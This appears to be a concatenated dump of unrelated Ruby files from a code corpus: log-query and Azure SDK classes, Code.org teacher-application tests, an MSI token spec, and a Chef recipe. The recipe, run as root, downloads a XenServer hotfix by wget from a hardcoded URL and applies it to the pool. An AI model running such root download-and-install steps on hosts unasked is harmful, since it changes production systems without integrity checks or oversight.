%x(bundle install)
%x(guard init)
end
end
end
end
| 23.5 | 85 | 0.662614 |
6a42379e7c641f9f36117d3bda34546559d60c83 | 2,071 | require 'loghouse_query/parsers'
require 'loghouse_query/storable'
require 'loghouse_query/pagination'
require 'loghouse_query/clickhouse'
require 'loghouse_query/permissions'
require 'loghouse_query/csv'
require 'log_entry'
require 'log'
class LoghouseQuery
include Parsers
include Storable
include Pagination
include Clickhouse
include Permissions
include CSV
TIME_PARAMS_DEFAULTS = {
format: 'seek_to',
seek_to: 'now',
from: 'now-15m',
to: 'now'
}.freeze
attr_accessor :attributes, :time_params, :persisted
def initialize(attrs = {})
attrs.symbolize_keys!
@attributes = self.class.columns.dup
@attributes.each do |k, v|
@attributes[k] = attrs[k] if attrs[k].present?
end
@attributes[:id] ||= SecureRandom.uuid
time_params({})
end
def time_params(params=nil)
return @time_params if params.nil?
@time_params = TIME_PARAMS_DEFAULTS.dup
params.each do |k, v|
@time_params[k] = params[k] if params[k].present?
end
case @time_params[:format]
when 'seek_to'
@time_params.slice!(:format, :seek_to)
when 'range'
@time_params.slice!(:format, :from, :to)
end
self
end
def id
attributes[:id]
end
def namespaces
Array.wrap(attributes[:namespaces])
end
def order_by
[attributes[:order_by], "#{LogsTables::TIMESTAMP_ATTRIBUTE} DESC", "#{LogsTables::NSEC_ATTRIBUTE} DESC"].compact.join(', ')
end
def validate_query!
parsed_query # sort of validation: will fail if format is not correct
end
def validate_time_params!
if time_params[:format] == 'range'
parsed_time_from # sort of validation: will fail if format is not correct
parsed_time_to # sort of validation: will fail if format is not correct
else
parsed_seek_to # sort of validation: will fail if format is not correct
end
end
def validate!(options = {})
super
validate_query! unless options[:query] == false
validate_time_params! unless options[:time_params] == false
end
end
require 'log_entry'
| 23.534091 | 127 | 0.691453 |
79c87abc043ff23820658b51a14fff4457adf0f6 | 1,361 | # Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::MediaServices::Mgmt::V2018_06_01_preview
module Models
#
# Represents a ContentKeyPolicyRestriction that is unavailable in the
# current API version.
#
class ContentKeyPolicyUnknownRestriction < ContentKeyPolicyRestriction
include MsRestAzure
def initialize
@odatatype = "#Microsoft.Media.ContentKeyPolicyUnknownRestriction"
end
attr_accessor :odatatype
#
# Mapper for ContentKeyPolicyUnknownRestriction class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: '#Microsoft.Media.ContentKeyPolicyUnknownRestriction',
type: {
name: 'Composite',
class_name: 'ContentKeyPolicyUnknownRestriction',
model_properties: {
odatatype: {
client_side_validation: true,
required: true,
serialized_name: '@odata\\.type',
type: {
name: 'String'
}
}
}
}
}
end
end
end
end
| 26.686275 | 81 | 0.602498 |
03ab1e85413d55e16c2ecdabe9f4dbe486bd6952 | 33,370 | require 'test_helper'
module Pd::Application
class Teacher1819ApplicationTest < ActiveSupport::TestCase
include Pd::Teacher1819ApplicationConstants
include ApplicationConstants
include RegionalPartnerTeacherconMapping
freeze_time
test 'application guid is generated on create' do
teacher_application = build :pd_teacher1819_application
assert_nil teacher_application.application_guid
teacher_application.save!
assert_not_nil teacher_application.application_guid
end
test 'existing guid is preserved' do
guid = SecureRandom.uuid
teacher_application = create :pd_teacher1819_application, application_guid: guid
assert_equal guid, teacher_application.application_guid
# save again
teacher_application.save!
assert_equal guid, teacher_application.application_guid
end
test 'principal_approval_url' do
teacher_application = build :pd_teacher1819_application
assert_nil teacher_application.principal_approval_url
# save to generate guid and therefore principal approval url
teacher_application.save!
assert teacher_application.principal_approval_url
end
test 'principal_greeting' do
hash_with_principal_title = build :pd_teacher1819_application_hash
hash_without_principal_title = build :pd_teacher1819_application_hash, principal_title: nil
application_with_principal_title = build :pd_teacher1819_application, form_data_hash: hash_with_principal_title
application_without_principal_title = build :pd_teacher1819_application, form_data_hash: hash_without_principal_title
assert_equal 'Dr. Dumbledore', application_with_principal_title.principal_greeting
assert_equal 'Albus Dumbledore', application_without_principal_title.principal_greeting
end
test 'meets criteria says an application meets critera when all YES_NO fields are marked yes' do
teacher_application = build :pd_teacher1819_application, course: 'csp',
response_scores: CRITERIA_SCORE_QUESTIONS_CSP.map {|x| [x, 'Yes']}.to_h.to_json
assert_equal 'Yes', teacher_application.meets_criteria
teacher_application = build :pd_teacher1819_application, course: 'csd',
response_scores: CRITERIA_SCORE_QUESTIONS_CSD.map {|x| [x, 'Yes']}.to_h.to_json
assert_equal 'Yes', teacher_application.meets_criteria
end
test 'meets criteria says an application does not meet criteria when any YES_NO fields are marked NO' do
teacher_application = build :pd_teacher1819_application, response_scores: {
committed: 'No'
}.to_json
assert_equal 'No', teacher_application.meets_criteria
end
test 'meets criteria returns incomplete when an application does not have YES on all YES_NO fields but has no NOs' do
teacher_application = build :pd_teacher1819_application, response_scores: {
committed: 'Yes'
}.to_json
assert_equal 'Reviewing incomplete', teacher_application.meets_criteria
end
test 'total score calculates the sum of all response scores' do
teacher_application = build :pd_teacher1819_application, response_scores: {
free_lunch_percent: '5',
underrepresented_minority_percent: '5',
able_to_attend_single: TEXT_FIELDS[:able_to_attend_single],
csp_which_grades: nil
}.to_json
assert_equal 10, teacher_application.total_score
end
test 'autoscore does not override existing scores' do
application_hash = build :pd_teacher1819_application_hash, {
committed: YES,
able_to_attend_single: TEXT_FIELDS[:able_to_attend_single],
csp_which_grades: ['12'],
csp_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].first,
previous_yearlong_cdo_pd: ['CS Discoveries'],
csp_how_offer: Pd::Application::Teacher1819Application.options[:csp_how_offer].last,
taught_in_past: ['CS in Algebra']
}
application = create(:pd_teacher1819_application, course: 'csp', form_data_hash: application_hash, regional_partner: (create :regional_partner))
application.auto_score!
assert_equal(
{
regional_partner_name: YES,
committed: YES,
able_to_attend_single: YES,
csp_which_grades: YES,
csp_course_hours_per_year: YES,
previous_yearlong_cdo_pd: YES,
csp_how_offer: 2,
taught_in_past: 2
}, application.response_scores_hash
)
application.update_form_data_hash(
{
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: '50.1%',
underrepresented_minority_percent: '50.1%',
wont_replace_existing_course: Pd::Application::PrincipalApproval1819Application.options[:replace_course].second,
}
)
application.update(response_scores: application.response_scores_hash.merge({regional_partner_name: NO}).to_json)
application.auto_score!
assert_equal(
{
regional_partner_name: NO,
committed: YES,
able_to_attend_single: YES,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: 5,
underrepresented_minority_percent: 5,
wont_replace_existing_course: 5,
csp_which_grades: YES,
csp_course_hours_per_year: YES,
previous_yearlong_cdo_pd: YES,
csp_how_offer: 2,
taught_in_past: 2
}, application.response_scores_hash
)
end
test 'autoscore for a CSP application where they should get YES/Points for everything' do
application_hash = build :pd_teacher1819_application_hash, {
committed: YES,
able_to_attend_single: TEXT_FIELDS[:able_to_attend_single],
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: '50.1%',
underrepresented_minority_percent: '50.1%',
wont_replace_existing_course: Pd::Application::PrincipalApproval1819Application.options[:replace_course].second,
csp_which_grades: ['12'],
csp_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].first,
previous_yearlong_cdo_pd: ['CS Discoveries'],
csp_how_offer: Pd::Application::Teacher1819Application.options[:csp_how_offer].last,
taught_in_past: ['CS in Algebra']
}
application = create :pd_teacher1819_application, course: 'csp', form_data_hash: application_hash
application.update(regional_partner: (create :regional_partner))
application.auto_score!
assert_equal(
{
regional_partner_name: YES,
committed: YES,
able_to_attend_single: YES,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: 5,
underrepresented_minority_percent: 5,
wont_replace_existing_course: 5,
csp_which_grades: YES,
csp_course_hours_per_year: YES,
previous_yearlong_cdo_pd: YES,
csp_how_offer: 2,
taught_in_past: 2
}, application.response_scores_hash
)
end
test 'autoscore for a CSP application where they should get NO/No points for everything' do
application_hash = build :pd_teacher1819_application_hash, {
committed: Pd::Application::Teacher1819Application.options[:committed].last,
able_to_attend_single: TEXT_FIELDS[:no_explain],
principal_approval: YES,
schedule_confirmed: NO,
diversity_recruitment: NO,
free_lunch_percent: '49.9%',
underrepresented_minority_percent: '49.9%',
wont_replace_existing_course: YES,
csp_which_grades: ['12'],
csp_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].last,
previous_yearlong_cdo_pd: ['CS Principles'],
csp_how_offer: Pd::Application::Teacher1819Application.options[:csp_how_offer].first,
taught_in_past: ['AP CS A']
}
application = create :pd_teacher1819_application, course: 'csp', form_data_hash: application_hash, regional_partner: nil
application.auto_score!
assert_equal(
{
regional_partner_name: NO,
committed: NO,
able_to_attend_single: NO,
principal_approval: YES, # Keep this as yes to test additional fields
schedule_confirmed: NO,
diversity_recruitment: NO,
free_lunch_percent: 0,
underrepresented_minority_percent: 0,
wont_replace_existing_course: nil,
csp_which_grades: YES, # Not possible to select responses for which this would be No
csp_course_hours_per_year: NO,
previous_yearlong_cdo_pd: NO,
csp_how_offer: 0,
taught_in_past: 0
}, application.response_scores_hash
)
end
test 'autoscore for a CSD application where they should get YES/Points for everything' do
application_hash = build(:pd_teacher1819_application_hash, :csd,
committed: YES,
able_to_attend_single: TEXT_FIELDS[:able_to_attend_single],
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: '50.1%',
underrepresented_minority_percent: '50.1%',
wont_replace_existing_course: Pd::Application::PrincipalApproval1819Application.options[:replace_course].second,
csd_which_grades: ['10', '11'],
csd_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].first,
previous_yearlong_cdo_pd: ['CS in Science'],
taught_in_past: Pd::Application::Teacher1819Application.options[:taught_in_past].last
)
application = create :pd_teacher1819_application, course: 'csd', form_data_hash: application_hash
application.update(regional_partner: (create :regional_partner))
application.auto_score!
assert_equal(
{
regional_partner_name: YES,
committed: YES,
able_to_attend_single: YES,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES,
free_lunch_percent: 5,
underrepresented_minority_percent: 5,
wont_replace_existing_course: 5,
csd_which_grades: YES,
csd_course_hours_per_year: YES,
previous_yearlong_cdo_pd: YES,
taught_in_past: 2
}, application.response_scores_hash
)
end
test 'autoscore for a CSD application where they should get NO/No points for everything' do
application_hash = build(:pd_teacher1819_application_hash, :csd,
committed: Pd::Application::Teacher1819Application.options[:committed].last,
able_to_attend_single: TEXT_FIELDS[:no_explain],
principal_approval: YES,
schedule_confirmed: NO,
diversity_recruitment: NO,
free_lunch_percent: '49.9%',
underrepresented_minority_percent: '49.9%',
wont_replace_existing_course: YES,
csd_which_grades: ['12'],
csd_course_hours_per_year: Pd::Application::ApplicationBase::COMMON_OPTIONS[:course_hours_per_year].last,
previous_yearlong_cdo_pd: ['Exploring Computer Science'],
taught_in_past: ['Exploring Computer Science']
)
application = create :pd_teacher1819_application, course: 'csd', form_data_hash: application_hash, regional_partner: nil
application.auto_score!
assert_equal(
{
regional_partner_name: NO,
committed: NO,
able_to_attend_single: NO,
principal_approval: YES, # Keep this as yes to test additional fields
schedule_confirmed: NO,
diversity_recruitment: NO,
free_lunch_percent: 0,
underrepresented_minority_percent: 0,
wont_replace_existing_course: nil,
csd_which_grades: NO,
csd_course_hours_per_year: NO,
previous_yearlong_cdo_pd: NO,
taught_in_past: 0
}, application.response_scores_hash
)
end
test 'autoscore for able_to_attend_multiple' do
application_hash = build :pd_teacher1819_application_hash, :with_multiple_workshops, :csd
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: nil
application.auto_score!
assert_equal(YES, application.response_scores_hash[:able_to_attend_multiple])
end
test 'autoscore for ambiguous responses to able_to_attend_multiple' do
application_hash = build(:pd_teacher1819_application_hash, :csd, :with_multiple_workshops,
able_to_attend_multiple: [
"December 11-15, 2017 in Indiana, USA",
TEXT_FIELDS[:no_explain]
]
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: nil
application.auto_score!
assert_nil application.response_scores_hash[:able_to_attend_multiple]
end
test 'autoscore for not able_to_attend_multiple' do
application_hash = build(:pd_teacher1819_application_hash, :csd, :with_multiple_workshops,
program: Pd::Application::Teacher1819Application::PROGRAM_OPTIONS.first,
able_to_attend_multiple: [TEXT_FIELDS[:no_explain]]
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: nil
application.auto_score!
assert_equal(NO, application.response_scores_hash[:able_to_attend_multiple])
end
test 'application meets criteria if able to attend single workshop' do
application_hash = build(:pd_teacher1819_application_hash,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: (create :regional_partner)
application.auto_score!
assert_equal(YES, application.meets_criteria)
end
test 'application meets criteria if able to attend multiple workshops' do
application_hash = build(:pd_teacher1819_application_hash, :with_multiple_workshops,
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: (create :regional_partner)
application.auto_score!
assert_equal(YES, application.meets_criteria)
end
test 'application does not meet criteria if unable to attend single workshop' do
application_hash = build(:pd_teacher1819_application_hash,
able_to_attend_single: [TEXT_FIELDS[:no_explain]],
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: (create :regional_partner)
application.auto_score!
assert_equal(NO, application.meets_criteria)
end
test 'application does not meet criteria if unable to attend multiple workshops' do
application_hash = build(:pd_teacher1819_application_hash, :with_multiple_workshops,
able_to_attend_multiple: [TEXT_FIELDS[:no_explain]],
principal_approval: YES,
schedule_confirmed: YES,
diversity_recruitment: YES
)
application = create :pd_teacher1819_application, form_data: application_hash.to_json, regional_partner: (create :regional_partner)
application.auto_score!
assert_equal(NO, application.meets_criteria)
end
test 'accepted_at updates times' do
today = Date.today.to_time
tomorrow = Date.tomorrow.to_time
application = create :pd_teacher1819_application
assert_nil application.accepted_at
Timecop.freeze(today) do
application.update!(status: 'accepted')
assert_equal today, application.accepted_at.to_time
application.update!(status: 'declined')
assert_nil application.accepted_at
end
Timecop.freeze(tomorrow) do
application.update!(status: 'accepted')
assert_equal tomorrow, application.accepted_at.to_time
end
end
test 'find_default_workshop finds no workshop for applications without a regional partner' do
application = build :pd_teacher1819_application
assert_nil application.find_default_workshop
end
test 'find_default_workshop finds a teachercon workshop for applications with a G3 partner' do
# stub process_location to prevent making Geocoder requests in test
Pd::Workshop.any_instance.stubs(:process_location)
teachercon_workshops = {}
[Pd::Workshop::COURSE_CSD, Pd::Workshop::COURSE_CSP].each do |course|
TEACHERCONS.each do |teachercon|
city = teachercon[:city]
teachercon_workshops[[course, city]] = create :pd_workshop,
num_sessions: 1, course: course, subject: Pd::Workshop::SUBJECT_TEACHER_CON, location_address: city
end
end
g3_partner_name = REGIONAL_PARTNER_TC_MAPPING.keys.sample
g3_partner = build :regional_partner, group: 3, name: g3_partner_name
application = build :pd_teacher1819_application, regional_partner: g3_partner
[Pd::Workshop::COURSE_CSD, Pd::Workshop::COURSE_CSP].each do |course|
city = get_matching_teachercon(g3_partner)[:city]
workshop = teachercon_workshops[[course, city]]
application.course = course === Pd::Workshop::COURSE_CSD ? 'csd' : 'csp'
assert_equal workshop, application.find_default_workshop
end
end
test 'find_default_workshop find an appropriate partner workshop for G1 and G2 partners' do
partner = create :regional_partner
program_manager = create :program_manager, regional_partner: partner
# where "appropriate workshop" is the earliest teachercon or local summer
# workshop matching the application course.
invalid_workshop = create :pd_workshop, organizer: program_manager
create :pd_session,
workshop: invalid_workshop,
start: Date.new(2018, 1, 10)
earliest_valid_workshop = create :pd_workshop, :local_summer_workshop, organizer: program_manager
create :pd_session,
workshop: earliest_valid_workshop,
start: Date.new(2018, 1, 15)
latest_valid_workshop = create :pd_workshop, :local_summer_workshop, organizer: program_manager
create :pd_session,
workshop: latest_valid_workshop,
start: Date.new(2018, 12, 15)
application = build :pd_teacher1819_application, course: 'csp', regional_partner: partner
assert_equal earliest_valid_workshop, application.find_default_workshop
end
test 'locking an application with pd_workshop_id automatically enrolls user' do
application = create :pd_teacher1819_application
workshop = create :pd_workshop
application.pd_workshop_id = workshop.id
application.status = "accepted"
assert_creates(Pd::Enrollment) do
application.lock!
end
assert_equal Pd::Enrollment.last.workshop, workshop
assert_equal Pd::Enrollment.last.id, application.auto_assigned_enrollment_id
end
test 'updating and re-locking an application with an auto-assigned enrollment will delete old enrollment' do
application = create :pd_teacher1819_application
first_workshop = create :pd_workshop
second_workshop = create :pd_workshop
application.pd_workshop_id = first_workshop.id
application.status = "accepted"
application.lock!
first_enrollment = Pd::Enrollment.find(application.auto_assigned_enrollment_id)
application.unlock!
application.pd_workshop_id = second_workshop.id
application.lock!
assert first_enrollment.reload.deleted?
assert_not_equal first_enrollment.id, application.auto_assigned_enrollment_id
end
test 'updating the application to unaccepted will also delete the autoenrollment' do
application = create :pd_teacher1819_application
workshop = create :pd_workshop
application.pd_workshop_id = workshop.id
application.status = "accepted"
application.lock!
first_enrollment = Pd::Enrollment.find(application.auto_assigned_enrollment_id)
application.unlock!
application.status = "waitlisted"
application.lock!
assert first_enrollment.reload.deleted?
application.unlock!
application.status = "accepted"
assert_creates(Pd::Enrollment) do
application.lock!
end
assert_not_equal first_enrollment.id, application.auto_assigned_enrollment_id
end
test 'school_info_attr for specific school' do
school = create :school
form_data_hash = build :pd_teacher1819_application_hash, school: school
application = create :pd_teacher1819_application, form_data_hash: form_data_hash
assert_equal({school_id: school.id}, application.school_info_attr)
end
test 'school_info_attr for custom school' do
application = create :pd_teacher1819_application, form_data_hash: (
build :pd_teacher1819_application_hash,
:with_custom_school,
school_name: 'Code.org',
school_address: '1501 4th Ave',
school_city: 'Seattle',
school_state: 'Washington',
school_zip_code: '98101',
school_type: 'Public school'
)
assert_equal(
{
country: 'US',
school_type: 'public',
state: 'Washington',
zip: '98101',
school_name: 'Code.org',
full_address: '1501 4th Ave',
validation_type: SchoolInfo::VALIDATION_NONE
},
application.school_info_attr
)
end
test 'update_user_school_info with specific school overwrites user school info' do
user = create :teacher, school_info: create(:school_info)
application_school_info = create :school_info
application = create :pd_teacher1819_application, user: user, form_data_hash: (
build :pd_teacher1819_application_hash, school: application_school_info.school
)
application.update_user_school_info!
assert_equal application_school_info, user.school_info
end
test 'update_user_school_info with custom school does nothing when the user already a specific school' do
original_school_info = create :school_info
user = create :teacher, school_info: original_school_info
application = create :pd_teacher1819_application, user: user, form_data_hash: (
build :pd_teacher1819_application_hash, :with_custom_school
)
application.update_user_school_info!
assert_equal original_school_info, user.school_info
end
test 'update_user_school_info with custom school updates user info when user does not have a specific school' do
original_school_info = create :school_info_us_other
user = create :teacher, school_info: original_school_info
application = create :pd_teacher1819_application, user: user, form_data_hash: (
build :pd_teacher1819_application_hash, :with_custom_school
)
application.update_user_school_info!
refute_equal original_school_info.id, user.school_info_id
assert_not_nil user.school_info_id
end
test 'get_first_selected_workshop single local workshop' do
workshop = create :pd_workshop
application = create :pd_teacher1819_application, form_data_hash: (
build :pd_teacher1819_application_hash, regional_partner_workshop_ids: [workshop.id]
)
assert_equal workshop, application.get_first_selected_workshop
end
test 'get_first_selected_workshop multiple local workshops' do
workshops = (1..3).map {|i| create :pd_workshop, num_sessions: 2, sessions_from: Date.today + i, location_address: %w(tba TBA tba)[i - 1]}
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: workshops.map(&:id),
able_to_attend_multiple: (
# Select all but the first. Expect the first selected to be returned below
workshops[1..-1].map do |workshop|
"#{workshop.friendly_date_range} in #{workshop.location_address} hosted by Code.org"
end
)
)
)
assert_equal workshops[1], application.get_first_selected_workshop
end
test 'get_first_selected_workshop multiple local workshops no selection returns first' do
workshops = (1..2).map {|i| create :pd_workshop, num_sessions: 2, sessions_from: Date.today + i}
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: workshops.map(&:id),
able_to_attend_multiple: []
)
)
assert_equal workshops.first, application.get_first_selected_workshop
end
test 'get_first_selected_workshop with no workshops returns nil' do
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: []
)
)
assert_nil application.get_first_selected_workshop
end
test 'get_first_selected_workshop returns nil for teachercon even with local workshops' do
workshop = create :pd_workshop
application = create :pd_teacher1819_application, form_data_hash: (
build :pd_teacher1819_application_hash, teachercon: TC_PHOENIX, regional_partner_workshop_ids: [workshop.id]
)
assert_nil application.get_first_selected_workshop
end
test 'get_first_selected_workshop ignores single deleted workshops' do
workshop = create :pd_workshop
application = create :pd_teacher1819_application, form_data_hash: (
build :pd_teacher1819_application_hash, regional_partner_workshop_ids: [workshop.id]
)
workshop.destroy
assert_nil application.get_first_selected_workshop
end
test 'get_first_selected_workshop ignores deleted workshop from multiple list' do
workshops = (1..2).map {|i| create :pd_workshop, num_sessions: 2, sessions_from: Date.today + i}
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: workshops.map(&:id),
able_to_attend_multiple: []
)
)
workshops[0].destroy
assert_equal workshops[1], application.get_first_selected_workshop
workshops[1].destroy
assert_nil application.get_first_selected_workshop
end
test 'get_first_selected_workshop picks correct workshop even when multiple are on the same day' do
workshop_1 = create :pd_workshop, num_sessions: 2, sessions_from: Date.today + 2
workshop_2 = create :pd_workshop, num_sessions: 2, sessions_from: Date.today + 2
workshop_1.update_column(:location_address, 'Location 1')
workshop_2.update_column(:location_address, 'Location 2')
application = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: [workshop_1.id, workshop_2.id],
able_to_attend_multiple: ["#{workshop_2.friendly_date_range} in Location 2 hosted by Code.org"]
)
)
assert_equal workshop_2, application.get_first_selected_workshop
application_2 = create :pd_teacher1819_application, form_data_hash: (
build(:pd_teacher1819_application_hash, :with_multiple_workshops,
regional_partner_workshop_ids: [workshop_1.id, workshop_2.id],
able_to_attend_multiple: ["#{workshop_2.friendly_date_range} in Location 1 hosted by Code.org"]
)
)
assert_equal workshop_1, application_2.get_first_selected_workshop
end
test 'assign_default_workshop! saves the default workshop' do
application = create :pd_teacher1819_application
workshop = create :pd_workshop
application.expects(:find_default_workshop).returns(workshop)
application.assign_default_workshop!
assert_equal workshop.id, application.reload.pd_workshop_id
end
test 'assign_default_workshop! does nothing when a workshop is already assigned' do
workshop = create :pd_workshop
application = create :pd_teacher1819_application, pd_workshop_id: workshop.id
application.expects(:find_default_workshop).never
application.assign_default_workshop!
assert_equal workshop.id, application.reload.pd_workshop_id
end
test 'can_see_locked_status?' do
teacher = create :teacher
g1_program_manager = create :program_manager, regional_partner: create(:regional_partner, group: 1)
g3_program_manager = create :program_manager, regional_partner: create(:regional_partner, group: 3)
workshop_admin = create :workshop_admin
refute Teacher1819Application.can_see_locked_status?(teacher)
refute Teacher1819Application.can_see_locked_status?(g1_program_manager)
assert Teacher1819Application.can_see_locked_status?(g3_program_manager)
assert Teacher1819Application.can_see_locked_status?(workshop_admin)
end
test 'locked status appears in csv only when the supplied user can_see_locked_status' do
application = create :pd_teacher1819_application
mock_user = mock
Teacher1819Application.stubs(:can_see_locked_status?).returns(false)
header_without_locked = Teacher1819Application.csv_header('csf', mock_user)
refute header_without_locked.include? 'Locked'
row_without_locked = application.to_csv_row(mock_user)
assert_equal CSV.parse(header_without_locked).length, CSV.parse(row_without_locked).length,
"Expected header and row to have the same number of columns, excluding Locked"
Teacher1819Application.stubs(:can_see_locked_status?).returns(true)
header_with_locked = Teacher1819Application.csv_header('csf', mock_user)
assert header_with_locked.include? 'Locked'
row_with_locked = application.to_csv_row(mock_user)
assert_equal CSV.parse(header_with_locked).length, CSV.parse(row_with_locked).length,
"Expected header and row to have the same number of columns, including Locked"
end
test 'to_cohort_csv' do
application = build :pd_teacher1819_application
optional_columns = {registered_workshop: false, accepted_teachercon: true}
assert (header = Teacher1819Application.cohort_csv_header(optional_columns))
assert (row = application.to_cohort_csv_row(optional_columns))
assert_equal CSV.parse(header).length, CSV.parse(row).length,
"Expected header and row to have the same number of columns"
end
test 'school cache' do
school = create :school
form_data_hash = build :pd_teacher1819_application_hash, school: school
application = create :pd_teacher1819_application, form_data_hash: form_data_hash
# Original query: School, SchoolDistrict
assert_queries 2 do
assert_equal school.name.titleize, application.school_name
assert_equal school.school_district.name.titleize, application.district_name
end
# Cached
assert_queries 0 do
assert_equal school.name.titleize, application.school_name
assert_equal school.school_district.name.titleize, application.district_name
end
end
test 'cache prefetch' do
school = create :school
workshop = create :pd_workshop
form_data_hash = build :pd_teacher1819_application_hash, school: school
application = create :pd_teacher1819_application, form_data_hash: form_data_hash, pd_workshop_id: workshop.id
# Workshop, Session, Enrollment, School, SchoolDistrict
assert_queries 5 do
Teacher1819Application.prefetch_associated_models([application])
end
assert_queries 0 do
assert_equal school.name.titleize, application.school_name
assert_equal school.school_district.name.titleize, application.district_name
assert_equal workshop, application.workshop
end
end
test 'memoized filtered_labels' do
Teacher1819Application::FILTERED_LABELS.clear
filtered_labels_csd = Teacher1819Application.filtered_labels('csd')
assert filtered_labels_csd.include? :csd_which_grades
refute filtered_labels_csd.include? :csp_which_grades
assert_equal ['csd'], Teacher1819Application::FILTERED_LABELS.keys
filtered_labels_csd = Teacher1819Application.filtered_labels('csp')
refute filtered_labels_csd.include? :csd_which_grades
assert filtered_labels_csd.include? :csp_which_grades
assert_equal ['csd', 'csp'], Teacher1819Application::FILTERED_LABELS.keys
end
end
end
| 41.350682 | 150 | 0.723374 |
6a9a80f5adfd85a7feda097b1d398cd57ab96673 | 2,732 | # encoding: utf-8
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
require 'rspec'
require 'ms_rest_azure'
module MsRestAzure
describe MSITokenProvider do
it 'should throw error if nil data is passed into constructor' do
expect { MSITokenProvider.new(50431,nil) }.to raise_error(ArgumentError)
end
it 'should set defaults for managed service identity' do
azure_cloud = MsRestAzure::AzureEnvironments::AzureCloud
token_provider = MSITokenProvider.new
token_expires_on = token_provider.token_expires_on
token_type = token_provider.token_type
token = token_provider.token
expect(token_provider.send(:port)).to eq(50342)
settings = token_provider.send(:settings)
expect(settings.authentication_endpoint).to eq(azure_cloud.active_directory_endpoint_url)
expect(settings.token_audience).to eq(azure_cloud.active_directory_resource_id)
end
it 'should set customs for managed service identity' do
port = 50333
settings = ActiveDirectoryServiceSettings.new()
settings.authentication_endpoint = 'https://login.microsoftonline.com/'
settings.token_audience = 'https://vault.azure.net'
token_provider = MSITokenProvider.new(port, settings)
expect(token_provider.send(:port)).to eq(port)
settings = token_provider.send(:settings)
expect(settings.authentication_endpoint).to eq(settings.authentication_endpoint)
expect(settings.token_audience).to eq(settings.token_audience)
end
it 'should throw error if more than one value is passed to msi_id' do
expect { MSITokenProvider.new(50342, ActiveDirectoryServiceSettings.get_azure_settings, {:client_id => '1234', :object_id => '5678'}) }.to raise_error(ArgumentError)
end
it 'should set msi_id for user assigned identity - using client_id' do
id = '1234'
token_provider = MSITokenProvider.new(50342, ActiveDirectoryServiceSettings.get_azure_settings, {:client_id => id})
expect(token_provider.send('client_id')).to eq(id)
end
it 'should set msi_id for user assigned identity - using object_id' do
id = '1234'
token_provider = MSITokenProvider.new(50342, ActiveDirectoryServiceSettings.get_azure_settings, {:object_id => id})
expect(token_provider.send('object_id')).to eq(id)
end
it 'should set msi_id for user assigned identity - using msi_res_id' do
id = '1234'
token_provider = MSITokenProvider.new(50342, ActiveDirectoryServiceSettings.get_azure_settings, {:msi_res_id => id})
expect(token_provider.send('msi_res_id')).to eq(id)
end
end
end
| 41.393939 | 171 | 0.739019 |
622037a2338d49b5b32e51c75a4f4d81528c280b | 1,194 | #
# Cookbook Name:: xs_maintenance
# Recipe:: hotfix-XS62ESP1004
#
# Copyright (C) 2014 Todd Pigram
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# CVE-2015-4106, CVE-2015-4163, CVE-2015-4164, CVE-2015-2756, CVE-2015-4103, CVE-2015-4104, CVE-2015-4105
bash "install XS65ESP1004" do
user "root"
cwd "/tmp"
code <<-EOH
mkdir -p /tmp/hotfixes
cd /tmp/hotfixes
wget http://downloadns.citrix.com.edgesuite.net/10663/XS65ESP1004.zip
unzip XS65ESP1004.zip
. /etc/xensource-inventory
PATCHUUID=$(xe patch-upload file-name=XS65ESP1004.xsupdate)
xe patch-pool-apply uuid=${PATCHUUID}
xe patch-clean uuid=${PATCHUUID}
EOH
not_if {::File.exists?(node['xs65sp1']['004'])}
end | 30.615385 | 105 | 0.735343 |
ff4a39a77e9d30cb5808a6d7911ffc173b03aa2c | 1,320 | require_relative 'lib/slack_app/version'
Gem::Specification.new do |spec|
spec.name = "slack_app"
spec.version = SlackApp::VERSION
spec.authors = ["Gerry Larios"]
spec.email = ["[email protected]"]
spec.summary = %q{A Ruby wrapper for the Slack Api. Block kit included.}
